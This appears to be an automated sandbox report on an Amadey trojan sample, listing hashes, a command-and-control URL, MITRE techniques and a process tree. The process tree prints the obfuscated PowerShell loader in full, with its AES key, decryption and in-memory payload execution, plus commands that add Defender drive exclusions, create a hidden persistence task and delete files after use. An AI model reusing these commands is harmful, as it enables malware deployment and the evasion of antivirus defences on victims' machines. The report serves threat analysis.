amadey | 9cd61c9f15d24cf7aeeb74c78353daa96a75afb1610e5abaef79e5b777c84135

Analysis

max time kernel
126s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2023, 12:00

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

amadey4.bat
Size

3.3MB
MD5

6d3bc827d3ee74ac36cfe4fa25b56af1
SHA1

09f618ed800b03879d2c545607d349e5998604c4
SHA256

9cd61c9f15d24cf7aeeb74c78353daa96a75afb1610e5abaef79e5b777c84135
SHA512

5157e218ff08a04412423ce9a9c16f891005d6b99bea640dd44c4afb3afd307d0931184f7336a3a6b83ea8dc47c3d4b3370f94915e580b3bc74e93cf6f0427f2
SSDEEP

49152:BfcVNUHb0wJxX2tdOVO/k2TKfVv5QaGI2JuRL7:l

Score

10^/10

amadey trojan

Malware Config

Extracted

Family

amadey

Version

3.84

myserveur855.cc/folder966/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation	vOMAP.cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation	amadey4.bat.exe

Executes dropped EXE 4 IoCs

pid	Process
3000	amadey4.bat.exe
668	Injector.exe
1552	vOMAP.cmd.exe
680	qncclj1u.wp5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\Local Settings	amadey4.bat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
3000	amadey4.bat.exe
4484	powershell.exe
4880	powershell.exe
4484	powershell.exe
4880	powershell.exe
4484	powershell.exe
4484	powershell.exe
4516	powershell.exe
4516	powershell.exe
556	powershell.exe
3136	powershell.exe
556	powershell.exe
3136	powershell.exe
3136	powershell.exe
3136	powershell.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
1552	vOMAP.cmd.exe
2772	powershell.exe
5096	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3000	amadey4.bat.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeIncreaseQuotaPrivilege	4516	powershell.exe
Token: SeSecurityPrivilege	4516	powershell.exe
Token: SeTakeOwnershipPrivilege	4516	powershell.exe
Token: SeLoadDriverPrivilege	4516	powershell.exe
Token: SeSystemProfilePrivilege	4516	powershell.exe
Token: SeSystemtimePrivilege	4516	powershell.exe
Token: SeProfSingleProcessPrivilege	4516	powershell.exe
Token: SeIncBasePriorityPrivilege	4516	powershell.exe
Token: SeCreatePagefilePrivilege	4516	powershell.exe
Token: SeBackupPrivilege	4516	powershell.exe
Token: SeRestorePrivilege	4516	powershell.exe
Token: SeShutdownPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeSystemEnvironmentPrivilege	4516	powershell.exe
Token: SeRemoteShutdownPrivilege	4516	powershell.exe
Token: SeUndockPrivilege	4516	powershell.exe
Token: SeManageVolumePrivilege	4516	powershell.exe
Token: 33	4516	powershell.exe
Token: 34	4516	powershell.exe
Token: 35	4516	powershell.exe
Token: 36	4516	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeIncreaseQuotaPrivilege	556	powershell.exe
Token: SeSecurityPrivilege	556	powershell.exe
Token: SeTakeOwnershipPrivilege	556	powershell.exe
Token: SeLoadDriverPrivilege	556	powershell.exe
Token: SeSystemProfilePrivilege	556	powershell.exe
Token: SeSystemtimePrivilege	556	powershell.exe
Token: SeProfSingleProcessPrivilege	556	powershell.exe
Token: SeIncBasePriorityPrivilege	556	powershell.exe
Token: SeCreatePagefilePrivilege	556	powershell.exe
Token: SeBackupPrivilege	556	powershell.exe
Token: SeRestorePrivilege	556	powershell.exe
Token: SeShutdownPrivilege	556	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeSystemEnvironmentPrivilege	556	powershell.exe
Token: SeRemoteShutdownPrivilege	556	powershell.exe
Token: SeUndockPrivilege	556	powershell.exe
Token: SeManageVolumePrivilege	556	powershell.exe
Token: 33	556	powershell.exe
Token: 34	556	powershell.exe
Token: 35	556	powershell.exe
Token: 36	556	powershell.exe
Token: SeIncreaseQuotaPrivilege	556	powershell.exe
Token: SeSecurityPrivilege	556	powershell.exe
Token: SeTakeOwnershipPrivilege	556	powershell.exe
Token: SeLoadDriverPrivilege	556	powershell.exe
Token: SeSystemProfilePrivilege	556	powershell.exe
Token: SeSystemtimePrivilege	556	powershell.exe
Token: SeProfSingleProcessPrivilege	556	powershell.exe
Token: SeIncBasePriorityPrivilege	556	powershell.exe
Token: SeCreatePagefilePrivilege	556	powershell.exe
Token: SeBackupPrivilege	556	powershell.exe
Token: SeRestorePrivilege	556	powershell.exe
Token: SeShutdownPrivilege	556	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeSystemEnvironmentPrivilege	556	powershell.exe
Token: SeRemoteShutdownPrivilege	556	powershell.exe
Token: SeUndockPrivilege	556	powershell.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2828	2180	cmd.exe	85
PID 2180 wrote to memory of 2828	2180	cmd.exe	85
PID 2828 wrote to memory of 3000	2828	cmd.exe	87
PID 2828 wrote to memory of 3000	2828	cmd.exe	87
PID 2828 wrote to memory of 3000	2828	cmd.exe	87
PID 3000 wrote to memory of 4484	3000	amadey4.bat.exe	88
PID 3000 wrote to memory of 4484	3000	amadey4.bat.exe	88
PID 3000 wrote to memory of 4484	3000	amadey4.bat.exe	88
PID 3000 wrote to memory of 4880	3000	amadey4.bat.exe	90
PID 3000 wrote to memory of 4880	3000	amadey4.bat.exe	90
PID 3000 wrote to memory of 4880	3000	amadey4.bat.exe	90
PID 3000 wrote to memory of 4516	3000	amadey4.bat.exe	92
PID 3000 wrote to memory of 4516	3000	amadey4.bat.exe	92
PID 3000 wrote to memory of 4516	3000	amadey4.bat.exe	92
PID 3000 wrote to memory of 668	3000	amadey4.bat.exe	94
PID 3000 wrote to memory of 668	3000	amadey4.bat.exe	94
PID 3000 wrote to memory of 668	3000	amadey4.bat.exe	94
PID 3000 wrote to memory of 3136	3000	amadey4.bat.exe	95
PID 3000 wrote to memory of 3136	3000	amadey4.bat.exe	95
PID 3000 wrote to memory of 3136	3000	amadey4.bat.exe	95
PID 3000 wrote to memory of 556	3000	amadey4.bat.exe	98
PID 3000 wrote to memory of 556	3000	amadey4.bat.exe	98
PID 3000 wrote to memory of 556	3000	amadey4.bat.exe	98
PID 3000 wrote to memory of 3944	3000	amadey4.bat.exe	99
PID 3000 wrote to memory of 3944	3000	amadey4.bat.exe	99
PID 3000 wrote to memory of 3944	3000	amadey4.bat.exe	99
PID 3944 wrote to memory of 4632	3944	WScript.exe	100
PID 3944 wrote to memory of 4632	3944	WScript.exe	100
PID 3944 wrote to memory of 4632	3944	WScript.exe	100
PID 4632 wrote to memory of 1552	4632	cmd.exe	103
PID 4632 wrote to memory of 1552	4632	cmd.exe	103
PID 4632 wrote to memory of 1552	4632	cmd.exe	103
PID 1552 wrote to memory of 2772	1552	vOMAP.cmd.exe	107
PID 1552 wrote to memory of 2772	1552	vOMAP.cmd.exe	107
PID 1552 wrote to memory of 2772	1552	vOMAP.cmd.exe	107
PID 1552 wrote to memory of 5096	1552	vOMAP.cmd.exe	109
PID 1552 wrote to memory of 5096	1552	vOMAP.cmd.exe	109
PID 1552 wrote to memory of 5096	1552	vOMAP.cmd.exe	109
PID 1552 wrote to memory of 2180	1552	vOMAP.cmd.exe	113
PID 1552 wrote to memory of 2180	1552	vOMAP.cmd.exe	113
PID 1552 wrote to memory of 2180	1552	vOMAP.cmd.exe	113
PID 1552 wrote to memory of 680	1552	vOMAP.cmd.exe	115
PID 1552 wrote to memory of 680	1552	vOMAP.cmd.exe	115
PID 1552 wrote to memory of 680	1552	vOMAP.cmd.exe	115
PID 1552 wrote to memory of 564	1552	vOMAP.cmd.exe	116
PID 1552 wrote to memory of 564	1552	vOMAP.cmd.exe	116
PID 1552 wrote to memory of 564	1552	vOMAP.cmd.exe	116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\amadey4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\amadey4.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Users\Admin\AppData\Local\Temp\amadey4.bat.exe
    "C:\Users\Admin\AppData\Local\Temp\amadey4.bat.exe" -w hidden -c $WktQ='EleHaYumeHaYuntAtHaYu'.Replace('HaYu', '');$ZDaV='InHaYuvHaYuokeHaYu'.Replace('HaYu', '');$uiBT='RHaYueadHaYuLiHaYunesHaYu'.Replace('HaYu', '');$alcO='CreHaYuateHaYuDeHaYucrHaYuypHaYutHaYuorHaYu'.Replace('HaYu', '');$emYH='LHaYuoaHaYudHaYu'.Replace('HaYu', '');$ThiF='EntrHaYuyHaYuPoHaYuintHaYu'.Replace('HaYu', '');$mwET='SplHaYuitHaYu'.Replace('HaYu', '');$MPwy='MHaYuaiHaYunMoHaYudHaYuuleHaYu'.Replace('HaYu', '');$YRdj='GeHaYutCuHaYurHaYurenHaYutProHaYucesHaYusHaYu'.Replace('HaYu', '');$PtWD='THaYuranHaYusfoHaYurmFHaYuinHaYualBlHaYuocHaYukHaYu'.Replace('HaYu', '');$puzA='FHaYuroHaYumBaHaYusHaYue6HaYu4StHaYuriHaYungHaYu'.Replace('HaYu', '');$IsrV='ChHaYuangeHaYuExtHaYuenHaYusionHaYu'.Replace('HaYu', '');function BRGtW($xWdDb){$KfUES=[System.Security.Cryptography.Aes]::Create();$KfUES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KfUES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KfUES.Key=[System.Convert]::$puzA('Abgya86TAzO0c6x3qocdB19803p/rSZfBL0/YaEmp+w=');$KfUES.IV=[System.Convert]::$puzA('Ut92tqF5+KP4+PJZCsxZDw==');$HSoSl=$KfUES.$alcO();$LMpkz=$HSoSl.$PtWD($xWdDb,0,$xWdDb.Length);$HSoSl.Dispose();$KfUES.Dispose();$LMpkz;}function nwDkE($xWdDb){$BgtLg=New-Object System.IO.MemoryStream(,$xWdDb);$hrrMm=New-Object System.IO.MemoryStream;$vXJVa=New-Object System.IO.Compression.GZipStream($BgtLg,[IO.Compression.CompressionMode]::Decompress);$vXJVa.CopyTo($hrrMm);$vXJVa.Dispose();$BgtLg.Dispose();$hrrMm.Dispose();$hrrMm.ToArray();}$xiSON=[System.Linq.Enumerable]::$WktQ([System.IO.File]::$uiBT([System.IO.Path]::$IsrV([System.Diagnostics.Process]::$YRdj().$MPwy.FileName, $null)), 1);$wcZuI=$xiSON.Substring(2).$mwET(':');$bfeks=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[0])));$OUhkQ=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[1])));[System.Reflection.Assembly]::$emYH([byte[]]$OUhkQ).$ThiF.$ZDaV($null,$null);[System.Reflection.Assembly]::$emYH([byte[]]$bfeks).$ThiF.$ZDaV($null,$null);
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3000);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4880
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\amadey4')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4516
  - - C:\Users\Admin\AppData\Local\Temp\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
      4⤵
      Executes dropped EXE
      PID:668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(668);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3136
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_vOMAP' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\vOMAP.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:556
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\vOMAP.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3944
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\vOMAP.cmd" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4632
      - C:\Users\Admin\AppData\Roaming\vOMAP.cmd.exe
        
        "C:\Users\Admin\AppData\Roaming\vOMAP.cmd.exe" -w hidden -c $WktQ='EleHaYumeHaYuntAtHaYu'.Replace('HaYu', '');$ZDaV='InHaYuvHaYuokeHaYu'.Replace('HaYu', '');$uiBT='RHaYueadHaYuLiHaYunesHaYu'.Replace('HaYu', '');$alcO='CreHaYuateHaYuDeHaYucrHaYuypHaYutHaYuorHaYu'.Replace('HaYu', '');$emYH='LHaYuoaHaYudHaYu'.Replace('HaYu', '');$ThiF='EntrHaYuyHaYuPoHaYuintHaYu'.Replace('HaYu', '');$mwET='SplHaYuitHaYu'.Replace('HaYu', '');$MPwy='MHaYuaiHaYunMoHaYudHaYuuleHaYu'.Replace('HaYu', '');$YRdj='GeHaYutCuHaYurHaYurenHaYutProHaYucesHaYusHaYu'.Replace('HaYu', '');$PtWD='THaYuranHaYusfoHaYurmFHaYuinHaYualBlHaYuocHaYukHaYu'.Replace('HaYu', '');$puzA='FHaYuroHaYumBaHaYusHaYue6HaYu4StHaYuriHaYungHaYu'.Replace('HaYu', '');$IsrV='ChHaYuangeHaYuExtHaYuenHaYusionHaYu'.Replace('HaYu', '');function BRGtW($xWdDb){$KfUES=[System.Security.Cryptography.Aes]::Create();$KfUES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KfUES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KfUES.Key=[System.Convert]::$puzA('Abgya86TAzO0c6x3qocdB19803p/rSZfBL0/YaEmp+w=');$KfUES.IV=[System.Convert]::$puzA('Ut92tqF5+KP4+PJZCsxZDw==');$HSoSl=$KfUES.$alcO();$LMpkz=$HSoSl.$PtWD($xWdDb,0,$xWdDb.Length);$HSoSl.Dispose();$KfUES.Dispose();$LMpkz;}function nwDkE($xWdDb){$BgtLg=New-Object System.IO.MemoryStream(,$xWdDb);$hrrMm=New-Object System.IO.MemoryStream;$vXJVa=New-Object System.IO.Compression.GZipStream($BgtLg,[IO.Compression.CompressionMode]::Decompress);$vXJVa.CopyTo($hrrMm);$vXJVa.Dispose();$BgtLg.Dispose();$hrrMm.Dispose();$hrrMm.ToArray();}$xiSON=[System.Linq.Enumerable]::$WktQ([System.IO.File]::$uiBT([System.IO.Path]::$IsrV([System.Diagnostics.Process]::$YRdj().$MPwy.FileName, $null)), 1);$wcZuI=$xiSON.Substring(2).$mwET(':');$bfeks=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[0])));$OUhkQ=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[1])));[System.Reflection.Assembly]::$emYH([byte[]]$OUhkQ).$ThiF.$ZDaV($null,$null);[System.Reflection.Assembly]::$emYH([byte[]]$bfeks).$ThiF.$ZDaV($null,$null);
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1552);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\vOMAP')
        7⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\qncclj1u.wp5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qncclj1u.wp5.exe"
        7⤵
        Executes dropped EXE
        
        PID:680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(680);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
55150c36dee0c40fc647adbf3ac6a8dc

SHA1
7ea51dc755dca338f42c7ad934bd022d952c5ff8

SHA256
bfef1b8c051a07fcb4c303670a7c4cbf1ab08146a89ddb8d6af8b0e21e604605

SHA512
463489a44bbd3dd8f74342535b0bdd9743d24fc2bf8213a1c292557ca0fb0ae2338bc5b44154503253b107e4c379477540b501cb9bd716688e01a53e540f56b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
c6c3b1c3c733c786c59489ce1c330d11

SHA1
dccf577d5f89c30e880030a1e4d38faf1af618b1

SHA256
a0b1b071428df2847ce8459967db74e82040a47136dc8aa10402c80c9e25c05c

SHA512
a7a8da6199520f60ae5f912c36ef8802e72185a93e618465c5745e5531a3d79b7388f001bd6b674638787c13993a58d3b9ae349f12e5d2c154d0b4aa132126f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
ec7496965c4b33a8e981a71ad6b9202a

SHA1
0717b4f0810573cc86868fe9fe72b3b8b28667bf

SHA256
405e0242b4e0e9593d7fab1e5cfd2fd940d3b03317f0c06029a1ed801e012d42

SHA512
2b0c021308e9f4db9a8fe152cbf68576695b48a436e7785144927550dd6cf847d1a80b72d0c43459db012d7ebde11db0a9b3ab41e672e25848b1677290172964

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
ec7496965c4b33a8e981a71ad6b9202a

SHA1
0717b4f0810573cc86868fe9fe72b3b8b28667bf

SHA256
405e0242b4e0e9593d7fab1e5cfd2fd940d3b03317f0c06029a1ed801e012d42

SHA512
2b0c021308e9f4db9a8fe152cbf68576695b48a436e7785144927550dd6cf847d1a80b72d0c43459db012d7ebde11db0a9b3ab41e672e25848b1677290172964

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
c223cd61ce4658c81f699e782ddddcd1

SHA1
088d7a615b28a51e42681922b9eb6d1ed7db9941

SHA256
272511f37efcd1cfc9f65969b843044fbec4093a6982cc4c2fe0cdf47e291b09

SHA512
0b3b0539929023a57f644b6ff0538a9709de964f19a9852fb2b9418ce959ca6c743f6c345239db2eab3f5e98493eec110161e172a627462a2d8589bc09695916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f9806e48efbdd482b90d4da39a20844e

SHA1
5e74072d8110e9975295a4384c3ae1efcec9a730

SHA256
ffadf05424db5710319cbae82a4cb06075bb88ace4b146c2ce103f8d3054c721

SHA512
7a390c6f010d77c816878b8324de813544b196270c7176b1a440b0f16d3c327c33de63bcbd725fa487001ee3ad26735827fea3f6bcdeeaeddc2dcc96964ee961

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
eecc674647999e3030594c729d74f0ea

SHA1
ed8e831a7a45a580e6ff9c06a28d5e8235d2d0a2

SHA256
14797859f7f30b92792e513104293b93f77eb63491dfafc625afcc7c78eab99d

SHA512
cfabddf69c29d7e0a911c053c3c762690c30e3cc2e039962f41d1729bb7fb1e96c0acdc5a580709213b072b52e361a6843258a6b02b6262120118c792104251e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
eecc674647999e3030594c729d74f0ea

SHA1
ed8e831a7a45a580e6ff9c06a28d5e8235d2d0a2

SHA256
14797859f7f30b92792e513104293b93f77eb63491dfafc625afcc7c78eab99d

SHA512
cfabddf69c29d7e0a911c053c3c762690c30e3cc2e039962f41d1729bb7fb1e96c0acdc5a580709213b072b52e361a6843258a6b02b6262120118c792104251e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
3.0MB

MD5
b354fd2e972a44e95ee6b3a44550ddad

SHA1
d5cae518ab5d1f389413552e3316e67fe42d9aeb

SHA256
c166c62762f86a0f7512d3dcb799fe38189675470d3090522a1fcd553d9f9a60

SHA512
743e35d8f621224012f8de9fe82ff009537e8c768782689d983cb13c85aa5dba9e6e4f4ada2327c0441dbc7044c716733788741ccd4292d4226fae3ea038fa41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
3.0MB

MD5
b354fd2e972a44e95ee6b3a44550ddad

SHA1
d5cae518ab5d1f389413552e3316e67fe42d9aeb

SHA256
c166c62762f86a0f7512d3dcb799fe38189675470d3090522a1fcd553d9f9a60

SHA512
743e35d8f621224012f8de9fe82ff009537e8c768782689d983cb13c85aa5dba9e6e4f4ada2327c0441dbc7044c716733788741ccd4292d4226fae3ea038fa41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
3.0MB

MD5
b354fd2e972a44e95ee6b3a44550ddad

SHA1
d5cae518ab5d1f389413552e3316e67fe42d9aeb

SHA256
c166c62762f86a0f7512d3dcb799fe38189675470d3090522a1fcd553d9f9a60

SHA512
743e35d8f621224012f8de9fe82ff009537e8c768782689d983cb13c85aa5dba9e6e4f4ada2327c0441dbc7044c716733788741ccd4292d4226fae3ea038fa41

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxpwljq0.e2t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\amadey4.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\amadey4.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\qncclj1u.wp5.exe

Filesize
198KB

MD5
4f5f5a3769bd12f19c71517f77a55fa2

SHA1
522615ddf24590921787177d90c2f55049ae326e

SHA256
b76bb8d0107a1c6253cc14ae472cc655136f187744210838cfb2eefe70c96eb6

SHA512
1c463b5d81a083ac2e6943a2ff2597a791d80d247bb7f5d7d23ac67c0a9c9dec51a2e6d1da1db736a3dea8079d32e30cd67205798a055472e53b0abb1c76a5db

Download Submit
C:\Users\Admin\AppData\Local\Temp\qncclj1u.wp5.exe

Filesize
198KB

MD5
4f5f5a3769bd12f19c71517f77a55fa2

SHA1
522615ddf24590921787177d90c2f55049ae326e

SHA256
b76bb8d0107a1c6253cc14ae472cc655136f187744210838cfb2eefe70c96eb6

SHA512
1c463b5d81a083ac2e6943a2ff2597a791d80d247bb7f5d7d23ac67c0a9c9dec51a2e6d1da1db736a3dea8079d32e30cd67205798a055472e53b0abb1c76a5db

Download Submit
